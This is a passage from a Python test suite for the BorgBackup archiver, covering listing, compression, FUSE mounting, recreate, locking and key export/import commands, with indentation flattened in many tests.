assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
    def test_list_json(self):
        """test JSON output of repo-level 'list --json' and archive-level 'list --json-lines'."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
        repository = list_repo['repository']
        assert len(repository['id']) == 64
        assert datetime.strptime(repository['last_modified'], ISO_FORMAT)  # must not raise
        assert list_repo['encryption']['mode'] == 'repokey'
        assert 'keyfile' not in list_repo['encryption']
        archive0 = list_repo['archives'][0]
        assert datetime.strptime(archive0['time'], ISO_FORMAT)  # must not raise
        # archive listing: one JSON object per line (dir + file => 2 items)
        list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
        items = [json.loads(s) for s in list_archive.splitlines()]
        assert len(items) == 2
        file1 = items[1]
        assert file1['path'] == 'input/file1'
        assert file1['size'] == 81920
        assert datetime.strptime(file1['mtime'], ISO_FORMAT)  # must not raise
        # a custom --format adds its placeholder keys to the JSON objects
        list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
        items = [json.loads(s) for s in list_archive.splitlines()]
        assert len(items) == 2
        file1 = items[1]
        assert file1['path'] == 'input/file1'
        assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
    def test_log_json(self):
        """--log-json must emit one JSON object per line, incl. file_status and log_message records."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
        messages = {}  # type -> message, one of each kind
        for line in log.splitlines():
            msg = json.loads(line)
            messages[msg['type']] = msg
        file_status = messages['file_status']
        assert 'status' in file_status
        assert file_status['path'].startswith('input')
        log_message = messages['log_message']
        assert isinstance(log_message['time'], float)
        assert log_message['levelname'] == 'DEBUG'  # there should only be DEBUG messages
        assert isinstance(log_message['message'], str)
    def test_debug_profile(self):
        """--debug-profile must write a loadable profile (borg format and pyprof format)."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
        # borg's own profile format needs conversion before pstats can load it
        self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
        stats = pstats.Stats('create.pyprof')
        stats.strip_dirs()
        stats.sort_stats('cumtime')
        # a .pyprof target is written in pstats format directly, no conversion needed
        self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
        stats = pstats.Stats('create.pyprof')  # Only do this on trusted data!
        stats.strip_dirs()
        stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize >= size
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize >= size
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize >= size
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize >= size
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize >= size
    def test_change_passphrase(self):
        """'key change-passphrase' must switch the repo key to BORG_NEW_PASSPHRASE."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
        # here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
        self.cmd('key', 'change-passphrase', self.repository_location)
        os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
        # opening the repo must now work with the new passphrase
        self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_fuse(self):
        """mount repo/archive via FUSE and verify metadata, contents, hardlinks, symlinks, FIFOs and xattrs."""
        def has_noatime(some_file):
            # detect whether O_NOATIME actually works here (needs flag support and permission)
            atime_before = os.stat(some_file).st_atime_ns
            try:
                os.close(os.open(some_file, flags_noatime))
            except PermissionError:
                return False
            else:
                atime_after = os.stat(some_file).st_atime_ns
                noatime_used = flags_noatime != flags_normal
                return noatime_used and atime_before == atime_after
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_test_files()
        have_noatime = has_noatime('input/file1')
        self.cmd('create', '--exclude-nodump', self.repository_location + '::archive', 'input')
        self.cmd('create', '--exclude-nodump', self.repository_location + '::archive2', 'input')
        if has_lchflags:
            # remove the file we did not backup, so input and output become equal
            os.remove(os.path.join('input', 'flagfile'))
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        # mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
        with self.fuse_mount(self.repository_location, mountpoint):
            # bsdflags are not supported by the FUSE mount
            # we also ignore xattrs here, they are tested separately
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
        # mount only 1 archive, its contents shall show up directly in mountpoint:
        with self.fuse_mount(self.repository_location + '::archive', mountpoint):
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
            # regular file
            in_fn = 'input/file1'
            out_fn = os.path.join(mountpoint, 'input', 'file1')
            # stat
            sti1 = os.stat(in_fn)
            sto1 = os.stat(out_fn)
            assert sti1.st_mode == sto1.st_mode
            assert sti1.st_uid == sto1.st_uid
            assert sti1.st_gid == sto1.st_gid
            assert sti1.st_size == sto1.st_size
            if have_noatime:
                assert sti1.st_atime == sto1.st_atime
            assert sti1.st_ctime == sto1.st_ctime
            assert sti1.st_mtime == sto1.st_mtime
            # note: there is another hardlink to this, see below
            assert sti1.st_nlink == sto1.st_nlink == 2
            # read
            with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
                assert in_f.read() == out_f.read()
            # hardlink (to 'input/file1')
            if are_hardlinks_supported():
                in_fn = 'input/hardlink'
                out_fn = os.path.join(mountpoint, 'input', 'hardlink')
                sti2 = os.stat(in_fn)
                sto2 = os.stat(out_fn)
                assert sti2.st_nlink == sto2.st_nlink == 2
                assert sto1.st_ino == sto2.st_ino
            # symlink
            if are_symlinks_supported():
                in_fn = 'input/link1'
                out_fn = os.path.join(mountpoint, 'input', 'link1')
                sti = os.stat(in_fn, follow_symlinks=False)
                sto = os.stat(out_fn, follow_symlinks=False)
                assert sti.st_size == len('somewhere')
                assert sto.st_size == len('somewhere')
                assert stat.S_ISLNK(sti.st_mode)
                assert stat.S_ISLNK(sto.st_mode)
                assert os.readlink(in_fn) == os.readlink(out_fn)
            # FIFO
            if are_fifos_supported():
                out_fn = os.path.join(mountpoint, 'input', 'fifo1')
                sto = os.stat(out_fn)
                assert stat.S_ISFIFO(sto.st_mode)
            # list/read xattrs
            try:
                in_fn = 'input/fusexattr'
                out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
                if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
                    assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
                    assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
                    assert xattr.getxattr(out_fn, b'user.empty') == b''
                else:
                    assert xattr.listxattr(out_fn) == []
                    try:
                        xattr.getxattr(out_fn, b'user.foo')
                    except OSError as e:
                        assert e.errno == llfuse.ENOATTR
                    else:
                        assert False, "expected OSError(ENOATTR), but no error was raised"
            except OSError as err:
                if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
                    # some systems have no xattr support on FUSE
                    pass
                else:
                    raise
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_fuse_allow_damaged_files(self):
        """damaged files must raise EIO on open unless mounted with -o allow_damaged_files."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive')
        # Get rid of a chunk and repair it
        archive, repository = self.open_archive('archive')
        with repository:
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    repository.delete(item.chunks[-1].id)
                    path = item.path  # store full path for later
                    break
            else:
                assert False  # missed the file
            repository.commit(compact=False)
        # repair replaces the lost chunk, marking the file as damaged
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        with self.fuse_mount(self.repository_location + '::archive', mountpoint):
            with pytest.raises(OSError) as excinfo:
                open(os.path.join(mountpoint, path))
            assert excinfo.value.errno == errno.EIO
        with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
            open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
    def verify_aes_counter_uniqueness(self, method):
        """Verify that AES CTR counter values are never reused across all repo objects.

        *method* is the encryption mode passed to 'borg init' (e.g. 'keyfile', 'repokey').
        """
        seen = set()  # Chunks already seen
        used = set()  # counter values already used
        def verify_uniqueness():
            # scan every object in the repo; each object's nonce must start a
            # counter range that does not overlap any range seen before
            with Repository(self.repository_path) as repository:
                for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
                    data = repository.get(id)
                    hash = sha256(data).digest()
                    if hash not in seen:
                        seen.add(hash)
                        # NOTE(review): offsets assume the envelope layout with the
                        # 8-byte nonce at bytes 33..40 and 41 bytes of header total
                        # before the ciphertext -- confirm against the key format.
                        num_blocks = num_cipher_blocks(len(data) - 41)
                        nonce = bytes_to_long(data[33:41])
                        for counter in range(nonce, nonce + num_blocks):
                            self.assert_not_in(counter, used)
                            used.add(counter)
        self.create_test_files()
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=' + method, self.repository_location)
        verify_uniqueness()
        self.cmd('create', self.repository_location + '::test', 'input')
        verify_uniqueness()
        self.cmd('create', self.repository_location + '::test.2', 'input')
        verify_uniqueness()
        self.cmd('delete', self.repository_location + '::test.2')
        verify_uniqueness()
    def test_aes_counter_uniqueness_keyfile(self):
        """AES counters must be unique when using keyfile encryption."""
        self.verify_aes_counter_uniqueness('keyfile')
    def test_aes_counter_uniqueness_passphrase(self):
        """AES counters must be unique when using repokey (passphrase) encryption."""
        self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
    def test_debug_put_get_delete_obj(self):
        """test the debug put-obj / get-obj / delete-obj round trip."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        data = b'some data'
        # put-obj stores the object under the sha256 of the file contents
        hexkey = sha256(data).hexdigest()
        self.create_regular_file('file', contents=data)
        output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
        assert hexkey in output
        output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
        assert hexkey in output
        with open('output/file', 'rb') as f:
            data_read = f.read()
        assert data == data_read
        output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
        assert "deleted" in output
        # deleting again must report the object as gone
        output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
        assert "not found" in output
        output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
        assert "is invalid" in output
    def test_init_interrupt(self):
        """an EOF (user abort) during key creation must not leave a repository behind."""
        def raise_eof(*args):
            # simulates the user aborting the passphrase prompt
            raise EOFError
        with patch.object(KeyfileKeyBase, 'create', raise_eof):
            self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
        assert not os.path.exists(self.repository_location)
    def test_init_requires_encryption_option(self):
        """'init' without --encryption must be rejected with rc 2 (usage error)."""
        self.cmd('init', self.repository_location, exit_code=2)
    def test_init_nested_repositories(self):
        """creating a repository inside an existing repository must fail."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        if self.FORK_DEFAULT:
            # forked borg process: the failure shows up as exit code 2
            self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
        else:
            # in-process borg: the failure surfaces as the exception itself
            with pytest.raises(Repository.AlreadyExists):
                self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
    def check_cache(self):
        """Run 'borg check', then verify the on-disk chunk cache exactly matches a freshly rebuilt one."""
        # First run a regular borg check
        self.cmd('check', self.repository_location)
        # Then check that the cache on disk matches exactly what's in the repo.
        with self.open_repository() as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest, sync=False) as cache:
                original_chunks = cache.chunks
            # destroy the cache and let it rebuild from the repository contents
            Cache.destroy(repository)
            with Cache(repository, key, manifest) as cache:
                correct_chunks = cache.chunks
        assert original_chunks is not correct_chunks
        seen = set()
        # every rebuilt entry must match the original entry exactly
        for id, (refcount, size, csize) in correct_chunks.iteritems():
            o_refcount, o_size, o_csize = original_chunks[id]
            assert refcount == o_refcount
            assert size == o_size
            assert csize == o_csize
            seen.add(id)
        # and the original cache must not contain entries the rebuilt one lacks
        for id, (refcount, size, csize) in original_chunks.iteritems():
            assert id in seen
    def test_check_cache(self):
        """check_cache must detect a chunks cache that is out of sync with the repository."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with self.open_repository() as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest, sync=False) as cache:
                # Corrupt the cache: bump one chunk's refcount without touching the repo.
                cache.begin_txn()
                cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
                cache.commit()
        # The helper compares disk cache vs. rebuilt cache and must now fail.
        with pytest.raises(AssertionError):
            self.check_cache()
    def test_recreate_target_rc(self):
        """recreate --target without naming a single source archive must fail with rc 2."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
        assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
    def test_recreate_recompress(self):
        """recreate --recompress must shrink data stored uncompressed, without altering contents."""
        self.create_regular_file('compressible', size=10000)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # Store the file uncompressed first.
        self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
        file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
                             '--format', '{size} {csize} {sha256}')
        size, csize, sha256_before = file_list.split(' ')
        assert int(csize) >= int(size)  # >= due to metadata overhead
        self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
        self.check_cache()
        file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
                             '--format', '{size} {csize} {sha256}')
        size, csize, sha256_after = file_list.split(' ')
        # Now lz4-compressed: csize dropped below size, but the content hash is unchanged.
        assert int(csize) < int(size)
        assert sha256_before == sha256_after
    def test_recreate_dry_run(self):
        """recreate -n (dry run) must not modify the archive."""
        self.create_regular_file('compressible', size=10000)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        archives_before = self.cmd('list', self.repository_location + '::test')
        # The exclude would drop a file - but -n must make this a no-op.
        self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
        self.check_cache()
        archives_after = self.cmd('list', self.repository_location + '::test')
        assert archives_after == archives_before
    def test_recreate_skips_nothing_to_do(self):
        """recreate with nothing to change must leave the archive (and its ID) untouched."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        info_before = self.cmd('info', self.repository_location + '::test')
        self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
        self.check_cache()
        info_after = self.cmd('info', self.repository_location + '::test')
        assert info_before == info_after  # includes archive ID
    def test_with_lock(self):
        """'with-lock' must hold the exclusive repository lock while the subcommand runs."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        lock_path = os.path.join(self.repository_path, 'lock.exclusive')
        # The child exits 42 if the lock file exists while it runs, 23 otherwise;
        # expecting 42 proves the lock was held during execution.
        cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
        self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
    def test_recreate_list_output(self):
        """recreate prints per-file status lines only when --list is given."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=0)
        self.create_regular_file('file2', size=0)
        self.create_regular_file('file3', size=0)
        self.create_regular_file('file4', size=0)
        self.create_regular_file('file5', size=0)
        self.cmd('create', self.repository_location + '::test', 'input')
        # With --list: per-file lines appear; 'x ' marks excluded files.
        output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
        self.check_cache()
        self.assert_in("input/file1", output)
        self.assert_in("x input/file2", output)
        output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
        self.check_cache()
        self.assert_in("input/file1", output)
        self.assert_in("x input/file3", output)
        # Without --list: no per-file lines, with or without --info.
        output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
        self.check_cache()
        self.assert_not_in("input/file1", output)
        self.assert_not_in("x input/file4", output)
        output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
        self.check_cache()
        self.assert_not_in("input/file1", output)
        self.assert_not_in("x input/file5", output)
    def test_bad_filters(self):
        """'delete' with both --first and --last must be rejected as a usage error (rc 2)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
    def test_key_export_keyfile(self):
        """'key export' of a keyfile repo reproduces the key file; 'key import' restores it."""
        export_file = self.output_path + '/exported'
        self.cmd('init', self.repository_location, '--encryption', 'keyfile')
        repo_id = self._extract_repository_id(self.repository_path)
        self.cmd('key', 'export', self.repository_location, export_file)
        with open(export_file, 'r') as fd:
            export_contents = fd.read()
        assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
        key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
        with open(key_file, 'r') as fd:
            key_contents = fd.read()
        # The exported key must be identical to the on-disk key file.
        assert key_contents == export_contents
        os.unlink(key_file)
        # Importing must recreate the deleted key file with the same contents.
        self.cmd('key', 'import', self.repository_location, export_file)
        with open(key_file, 'r') as fd:
            key_contents2 = fd.read()
        assert key_contents2 == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
assert repo_key2.enc_key == repo_key2.enc_key
    def test_key_export_qr(self):
        """'key export --qr-html' produces a self-contained HTML page embedding the key."""
        export_file = self.output_path + '/exported.html'
        self.cmd('init', self.repository_location, '--encryption', 'repokey')
        repo_id = self._extract_repository_id(self.repository_path)
        self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
        with open(export_file, 'r', encoding='utf-8') as fd:
            export_contents = fd.read()
        assert bin_to_hex(repo_id) in export_contents
        # Sanity-check the document is a complete HTML page.
        assert export_contents.startswith('<!doctype html>')
        assert export_contents.endswith('</html>')
    def test_key_export_directory(self):
        """'key export' to a path that is an existing directory must fail with an error."""
        export_directory = self.output_path + '/exported'
        os.mkdir(export_directory)
        self.cmd('init', self.repository_location, '--encryption', 'repokey')
        self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
    def test_key_import_errors(self):
        """'key import' must reject missing, malformed, and repo-mismatching key files."""
        export_file = self.output_path + '/exported'
        self.cmd('init', self.repository_location, '--encryption', 'keyfile')
        # Importing a non-existent file fails.
        self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
        # A file that is not a borg key file at all:
        with open(export_file, 'w') as fd:
            fd.write('something not a key\n')
        if self.FORK_DEFAULT:
            self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
        else:
            with pytest.raises(NotABorgKeyFile):
                self.cmd('key', 'import', self.repository_location, export_file)
        # A key file whose repository id does not match this repository:
        with open(export_file, 'w') as fd:
            fd.write('BORG_KEY a0a0a0\n')
        if self.FORK_DEFAULT:
